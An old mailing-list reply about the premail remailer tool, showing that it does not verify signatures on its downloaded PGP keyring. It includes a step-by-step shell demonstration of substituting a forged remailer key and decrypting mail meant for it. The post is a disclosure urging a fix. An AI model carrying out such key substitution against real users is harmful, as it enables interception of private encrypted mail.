[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: premail.



[email protected] (Bill Frantz) wrote:
> At 9:27 PM -0800 12/30/96, Anonymous wrote:
> >A scenario:
> >
> >1) The spooks put a bug (named Eve) on the link between
> >kiwi.cs.berkeley.edu and the Internet.
> 
> (2) Nomenclature quibble: It would have to be Mallory, not Eve.  Eve can
> only listen.  Mallory is a lot more dangerous because he can
> alter/delete/insert messages as well as listen.

	My mistake. Long time since I read Applied Cryptography, and that
too only partially.

> 
> (1) Protection against this scenario is what the signatures on the key are for.

Unfortunately, premail doesn't check the signatures. The only signatures
that pgp can recognize and verify are the self signatures (easy to spoof).
Note that even if the public keys of other signatories are included
in the pubring (unlike now), it will still be easy to spoof the signatures
if one can alter the pubring. The only safe way is to have a public key
generated by Raph included in the premail distribution and then sign the
pubring.pgp file at kiwi.cs.berkeley.edu, and/or its individual keys with it.

Here are three experments, all of which I did. The results are eye-opening.

1) Run premail with +debug=rv . pgp will warn about not being able to
verify signatures.

2) Do a pgp -kvv ~/.premail/pubring.pgp. You will see that all signatures
are either self-signatures or are unverifiable by pgp.

3) Do the following (lines starting with % are C shell commands. Lines
starting with # are comments. Don't enter them directly.)

% mkdir /tmp/k
% setenv PGPPATH /tmp/k
% cp ~/.premail/pubring.pgp /tmp/k

# Remove exon's key

% pgp -kr [email protected] /tmp/k/pubring.pgp

# Make a new key for exon.
# When pgp prompts for user-id enter
# Senator Exon <[email protected]>
# You may want to specify the lowest key size, 384, for convenience, and
# an easy passphrase such as `exon'.

% pgp -kg

# Make a mail file.

% cat > /tmp/k/mail <<!
To: [email protected] ((chain=exon))
Subject: A test.

Is this really encrypted for Senator Exon, or for the spooks?

!

# Backup your ~/.premail/pubring.pgp

% cp ~/.premail/pubring.pgp ~/.premail/pubring.pgp.BAK

# Now premail the mail file.
# You have two choices.

# If you have lynx installed, use this command. And make sure
# that enough time has expired since the last time you ran premail,
# so it is forced to download the pubring.
# This command is one line. It might have been folded by your mail reader,
# so unfold it.

% premail +storefile=/tmp/k/mailout.pgp +debug=rv +pubring-url=file:/tmp/k/pubring.pgp -t < /tmp/k/mail

# If you don't have lynx, just manually copy the pubring file to your
# .premail directory, and then run premail as follows. This time, make
# sure that premail doesn't download the pubring file, by not giving it
# enough time since you last ran it.
# The cp and the premail are both one line commands. Correct any folding.

% cp /tmp/k/pubring.pgp ~/.premail
% premail +storefile=/tmp/k/mailout.pgp +debug=rv -t < /tmp/k/mail

# Now see if you, the spook, can decrypt the file that normally premail
# would have send off to exon, blissfully unaware that the spooks are waiting
# to catch it.
# Use the pass phrase you chose when you did the pgp -kg step above.

% pgp /tmp/k/mailout.pgp
% cat /tmp/k/mailout

# Gee. Looks like the spooks got your mail, huh?

# If you can't decrypt /tmp/k/mailout.pgp the premail step used a different
# pubring than /tmp/k/pubring.pgp. Make sure /tmp/k/pubring.pgp and
# ~/.premail/pubring.pgp are identical, remove /tmp/k/mailout.pgp and
# run premail again.

# Restore everything.

% mv ~/.premail/pubring.pgp.BAK ~/.premail/pubring.pgp
% unsetenv PGPPATH
% rm -rf /tmp/k

# Convinced?